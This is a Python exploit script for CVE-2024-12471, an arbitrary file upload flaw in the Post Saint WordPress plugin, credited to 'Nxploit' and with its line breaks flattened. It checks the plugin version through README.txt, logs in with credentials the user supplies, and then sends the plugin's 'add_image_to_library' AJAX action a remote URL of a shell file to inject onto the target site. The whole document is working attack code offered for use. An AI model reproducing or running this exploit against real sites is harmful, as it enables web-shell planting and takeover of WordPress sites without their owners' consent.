import requests import argparse import re from urllib3.exceptions import InsecureRequestWarning from packaging.version import parse as parse_version #by Nxploit | Khaled_alenazi def banner(): print(""" @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@ @@@@@@ @@@ @@@@@@@@ @@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@ @@@@@@@@ @@@@ @@@@@@@@ @@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! @@@!! @@@ @@!@! @@! @@@!! !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@! @!@ !@!!@! !@! !@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ @!@ !!@ @!! @!! @!! @!@ !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! !@! !!: !!! !@! !!! !@! :!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: !!: !:! :!!:!:!!: !!: !!: :!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: :!: :!: !:::!!::: :!: :!: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: ::: :: ::::: ::: :: ::: :: :: : : : :: :: :: : ::: : : : : :: : ::: ::: :: :: : ::: ::: : : :: """) def parse_version_info(version_text): version_match = re.search(r"Stable tag:\s*([\d.]+)", version_text) if version_match: return version_match.group(1) return None def is_version_vulnerable(version, vulnerable_version="1.3.1"): return parse_version(version) <= parse_version(vulnerable_version) def check_version(base_url): version_url = f"{base_url}/wp-content/plugins/post-saint/README.txt" try: response = requests.get(version_url, verify=False, timeout=10) if response.status_code == 200: version = parse_version_info(response.text) if version: if is_version_vulnerable(version): print(f"Vulnerable version detected: {version}") else: print(f"Secure version detected: {version}") else: print("Version information not found in README.txt.") else: print(f"Failed to fetch version info. HTTP Status: {response.status_code}") except Exception as e: print(f"Error checking version: {e}") def login_wordpress(session, base_url, username, password): login_url = base_url + '/wp-login.php' user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" response = session.post( login_url, verify=False, data={ 'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log In' }, headers={"User-Agent": user_agent} ) if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): print("[+] Logged in successfully.") return True else: print("[-] Failed to log in.") return False if __name__ == "__main__": banner() parser = argparse.ArgumentParser(description="CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload") parser.add_argument("-u", "--url", required=True, help="Base URL of the WordPress site") parser.add_argument("-un", "--username", required=True, help="WordPress username") parser.add_argument("-p", "--password", required=True, help="WordPress password") parser.add_argument("-ru", "--remote_url", required=True, help="Remote URL of the shell file to inject") args = parser.parse_args() print("[+] Checking plugin version...") check_version(args.url) session = requests.Session() if not login_wordpress(session, args.url, args.username, args.password): exit() exploit_url = args.url + '/wp-admin/admin-ajax.php' payload = { 'action': 'add_image_to_library', 'image_url': args.remote_url, 'image_prompt': 'Nxploit', 'insert_prompt_media_library_fields': 'caption_description', 'image_generator': 'pexels', 'log_id': '1667' } response = session.post(exploit_url, data=payload, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"}, verify=False) if response.status_code == 200: print("[+] Exploit sent successfully.") print("Response:", response.text) else: print("[-] Exploit failed.") print("Status Code:", response.status_code) print("Response:", response.text)